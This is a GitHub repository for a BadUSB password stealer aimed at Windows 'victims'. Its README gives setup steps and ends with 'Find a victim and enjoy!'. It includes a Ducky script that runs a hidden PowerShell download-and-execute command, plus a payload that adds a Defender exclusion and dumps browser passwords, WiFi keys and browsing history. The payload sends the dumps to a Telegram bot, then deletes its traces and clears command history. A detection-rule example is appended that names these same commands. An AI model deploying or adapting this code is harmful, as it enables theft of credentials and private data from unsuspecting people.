Repository: tuconnaisyouknow/BadUSB_passStealer
Branch: main
Commit: 15c75a73a047
Files: 4
Total size: 10.8 KB
Directory structure:
gitextract_ugr1m322/
├── LICENSE
├── README.md
└── upload/
├── BadUSB_passStealer_upload.txt
└── ps.ps1
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2022 elliotYouKnow
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# 💀 BadUSB_passStealer
## ⚠️ Warning
Everything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script for **BadUSB**.
## ℹ️ About
This **script** allows you to steal the following **information**:
🔹 Browser **passwords** (Chrome, Firefox, Opera)
🔹 **WiFi** passwords
🔹 Browser **history** from the last 7 days
🔹 A **list** of all **devices** connected to the victim's network
## 🔑 Key Information for Users
### ⚠️ MalDuino & Rubber Ducky Users
You **must** replace **`CTRL-SHIFT ENTER`** with **`CTRL SHIFT ENTER`** in the [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1) file.
✅ **Flipper Zero users**, no changes are needed—this syntax is already compatible.
### ⚠️ Arduino Users
🚫 I **stopped upgrading** `.ino` scripts. If you need them, you can **convert Ducky Scripts** [here](https://duckify.huhn.me/).
### 🕒 Adjusting Delay
You can customize the **delays** based on the **speed** of the **target machine**.
### ⏳ Waiting for Execution
When you plug the **BadUSB** into a PC, **wait for the Caps Lock to flash** before unplugging it.
---
# 🚀 Getting Started
## 📌 Requirements
✔️ A **BadUSB**
✔️ Install **Arduino software** [here](https://www.arduino.cc/en/software) *(if using an Arduino-based BadUSB)*
✔️ A **Telegram account**
✔️ A **victim using Windows 10/11**
---
# 🤖 Setting up a Telegram Bot for Uploading Files
## 1️⃣ Create a Telegram Bot
1️⃣ Open [Telegram Web](https://web.telegram.org/) and log in.
2️⃣ Search for **@BotFather** in the Telegram search bar.
3️⃣ Click **Start** to begin a conversation.
4️⃣ Send `/newbot`.
5️⃣ Choose a bot **name** and send it.
6️⃣ Choose a bot **username** and send it.
7️⃣ **@BotFather** will provide an API token:
> Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands.
> Use this token to access the HTTP API:
> **API_ACCESS_TOKEN**
> For a description of the Bot API, see this page: https://core.telegram.org/bots/api
8️⃣ Start a chat with your bot by clicking **t.me/BOT_USERNAME** and pressing **Start**.
## 2️⃣ Get Your Telegram API Token
Your **API token** is provided in **@BotFather**'s response.
## 3️⃣ Get Your Telegram Chat ID
1️⃣ Open your browser and replace `API_ACCESS_TOKEN` in this URL:
```
https://api.telegram.org/bot<API_ACCESS_TOKEN>/getUpdates?offset=0
```
2️⃣ Send a **test message** to your bot on Telegram.
3️⃣ Refresh the API page.
4️⃣ Find your **chat ID** in the response JSON. Example:
```
"chat":{"id":123456789,"type":"private"}
```
Your chat ID is **123456789**.
---
# ⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero
1️⃣ **Download this repository**
🔹 **Linux:**
```bash
git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer
```
🔹 **Windows:**
- Click the **green "Code" button** at the top right.
- Click **"Download ZIP"** and extract it.
2️⃣ Replace **`<TOKEN>`** and **`<CHAT_ID>`** in [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1).
3️⃣ **Upload `ps.ps1` to get a downloadable link**.
4️⃣ Replace **`LINK`** in [`BadUSB_passStealer_upload.txt`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/BadUSB_passStealer_upload.txt) with the `ps.ps1` link.
5️⃣ Place the `.txt` file in your **BadUSB**.
6️⃣ **Find a victim and enjoy!** 🎭
---
# 🛠️ NirSoft Tools
🔗 You can download NirSoft tools here:
🔹 **[WebBrowserPassView.exe](https://www.nirsoft.net/protected_downloads/passreccommandline.zip)** *(User: `download` | Password: `nirsoft123!`)*
🔹 **[WNetWatcher.exe](https://www.nirsoft.net/utils/wireless_network_watcher.html)**
🔹 **[BrowsingHistoryView.exe](https://www.nirsoft.net/utils/browsing_history_view.html)**
🔹 **[WirelessKeyView.exe](https://www.nirsoft.net/utils/wireless_key.html)**
================================================
FILE: upload/BadUSB_passStealer_upload.txt
================================================
REM _
REM _ _ ___ _ _ | | ___ __ _____ __
REM | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
REM | |_| | (_) | |_| |_| <| | | | (_) \ V V /
REM \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
REM |___/
REM ###########################################################
REM # #
REM # Title : BadUSB_passStealer #
REM # Author : you.know #
REM # Version : 2.0 #
REM # Category : Data Exfiltration, Credential Dumping #
REM # Target : Windows 10/11 #
REM # #
REM # Description: #
REM # - Launches PowerShell in hidden mode #
REM # - Extracts browser passwords and WiFi credentials #
REM # - Saves them as .txt files #
REM # - Exfiltrates the data via Telegram #
REM # - Cleans up traces after execution #
REM # #
REM ###########################################################
REM Initial delay to ensure the system is ready
DELAY 2500
REM Minimize all active windows
GUI d
DELAY 500
REM Open Run dialog
GUI r
DELAY 500
REM Execute PowerShell hidden with administrative privileges
STRING powershell -w h -NoP -Ep Bypass -Command "irm <LINK> | iex"
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER
REM Flash CAPSLOCK as an indicator that execution is complete
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
================================================
FILE: upload/ps.ps1
================================================
# _
# _ _ ___ _ _ | | ___ __ _____ __
# | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
# | |_| | (_) | |_| |_| <| | | | (_) \ V V /
# \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
# |___/
$basePath = "C:\Users\Public\Documents\scripts"
$dumpFolder = "$basePath\$env:USERNAME-$(get-date -f yyyy-MM-dd)"
$dumpFile = "$dumpFolder.zip"
# Create directory
New-Item -ItemType Directory -Path $basePath -Force | Out-Null
Set-Location $basePath
New-Item -ItemType Directory -Path $dumpFolder -Force | Out-Null
Add-MpPreference -ExclusionPath $basePath -Force
# Download necessary tools
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WirelessKeyView.exe?raw=true -OutFile WirelessKeyView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true -OutFile WebBrowserPassView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe?raw=true -OutFile BrowsingHistoryView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=true -OutFile WNetWatcher.exe
# Execute tools to gather data
.\WNetWatcher.exe /stext connected_devices.txt
.\BrowsingHistoryView.exe /VisitTimeFilterType 3 7 /stext history.txt
.\WebBrowserPassView.exe /stext passwords.txt
.\WirelessKeyView.exe /stext wifi.txt
# Wait for the files to be fully written
while (!(Test-Path "passwords.txt") -or !(Test-Path "wifi.txt") -or !(Test-Path "connected_devices.txt") -or !(Test-Path "history.txt")) {
Start-Sleep -Seconds 1
}
Move-Item passwords.txt, wifi.txt, connected_devices.txt, history.txt -Destination "$dumpFolder"
# Compress extracted data
Compress-Archive -Path "$dumpFolder\*" -DestinationPath "$dumpFile" -Force
# Wait until the ZIP file is created
while (!(Test-Path "$dumpFile")) {
Start-Sleep -Seconds 1
}
# Telegram configuration
$token = "<TOKEN>"
$chatID = "<CHATID>"
$uri = "https://api.telegram.org/bot$token/sendDocument"
$caption = "Here are exfiltrated informations from $env:USERNAME"
# Check if the file exists before sending
if (!(Test-Path $dumpFile)) {
exit 1
}
# Ensure System.Net.Http is available
if (-not ("System.Net.Http.HttpClient" -as [type])) {
$httpPath = Get-ChildItem -Path "C:\Windows\Microsoft.NET\Framework64\" -Recurse -Filter "System.Net.Http.dll" | Select-Object -First 1 -ExpandProperty FullName
if ($httpPath) {
Add-Type -Path $httpPath
} else {
exit 1
}
}
# Create HTTP client
$client = New-Object System.Net.Http.HttpClient
$content = New-Object System.Net.Http.MultipartFormDataContent
$content.Add((New-Object System.Net.Http.StringContent($chatID)), "chat_id")
$content.Add((New-Object System.Net.Http.StringContent($caption)), "caption")
# Attach the ZIP file
$filename = [System.IO.Path]::GetFileName("$dumpFile")
$fileStream = [System.IO.File]::OpenRead("$dumpFile")
$fileContent = New-Object System.Net.Http.StreamContent($fileStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
$content.Add($fileContent, "document", $filename)
# Send data to Telegram
try {
$client.PostAsync($uri, $content).Wait()
} catch {}
# Cleanup
$fileStream.Close()
$fileStream.Dispose()
Set-Location C:\Users\Public\Documents
Remove-Item -Recurse -Force scripts
Remove-MpPreference -ExclusionPath "C:\Users\Public\Documents\scripts" -Force
# Caps Lock signal
$keyBoardObject = New-Object -ComObject WScript.Shell
for ($i=0; $i -lt 4; $i++) {
$keyBoardObject.SendKeys("{CAPSLOCK}")
Start-Sleep -Seconds 1
}
# Clear command history
Clear-Content (Get-PSReadlineOption).HistorySavePath
exit
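
A defender-side view of what the two files above do, as an added example that is not part of the repository: the Python below matches the behaviours visible in `BadUSB_passStealer_upload.txt` and `ps.ps1` against process command lines or PowerShell script-block text and flags a host that shows several of them together. The rule names, host names, the threshold of three and the sample events are assumptions constructed for illustration.

```python
import re

# Each rule is a list of patterns that must ALL appear in one event's text.
# The behaviours come from the two files above; rule names are this example's own.
RULES = {
    "hidden_download_cradle": [
        r"\bpowershell",
        r"-w(in\w*)?\s+h(idden)?\b",   # -w h / -WindowStyle Hidden
        r"-e(p|x\w*)\s+bypass\b",      # -Ep Bypass / -ExecutionPolicy Bypass
        r"\b(irm|invoke-restmethod)\b[^|]*\|\s*(iex|invoke-expression)\b",
    ],
    "defender_exclusion_added": [r"\bAdd-MpPreference\b.*-ExclusionPath\b"],
    "nirsoft_text_dump": [
        r"\b(WebBrowserPassView|WirelessKeyView|BrowsingHistoryView|WNetWatcher)"
        r"\.exe\b.*\s/stext\b"
    ],
    "telegram_bot_upload": [r"api\.telegram\.org/bot[^/\s]*/sendDocument"],
    "psreadline_history_wiped": [r"\bClear-Content\b.*HistorySavePath"],
}

# Constructed sample events: (host, command line or script-block text). Not real logs.
SAMPLE_EVENTS = [
    ("WS-014", 'powershell -w h -NoP -Ep Bypass -Command "irm https://example.invalid/ps.ps1 | iex"'),
    ("WS-014", r"Add-MpPreference -ExclusionPath C:\Users\Public\Documents\scripts -Force"),
    ("WS-014", r".\WebBrowserPassView.exe /stext passwords.txt"),
    ("WS-014", "POST https://api.telegram.org/bot<REDACTED>/sendDocument"),
    ("WS-014", "Clear-Content (Get-PSReadlineOption).HistorySavePath"),
    ("WS-022", r"powershell -NoProfile -File C:\IT\inventory.ps1"),
    ("WS-031", r"Add-MpPreference -ExclusionPath D:\build\cache"),
]

def match_rules(text):
    """Return the names of every rule whose patterns all occur in text."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, text, re.I) for p in pats)]

def triage(events, chain_threshold=3):
    """Map host -> (sorted rule hits, True if enough distinct behaviours co-occur)."""
    hits = {}
    for host, text in events:
        for rule in match_rules(text):
            hits.setdefault(host, set()).add(rule)
    return {h: (sorted(r), len(r) >= chain_threshold) for h, r in hits.items()}

if __name__ == "__main__":
    for host, (rules, chain) in triage(SAMPLE_EVENTS).items():
        print(host, "FULL CHAIN" if chain else "review", rules)
```

On Windows the input text would typically come from process-creation events (Security 4688 with command-line auditing, or Sysmon event ID 1) and PowerShell script-block logging (event ID 4104). A single hit such as a lone Defender exclusion is left for review rather than flagged, since administrators add exclusions legitimately.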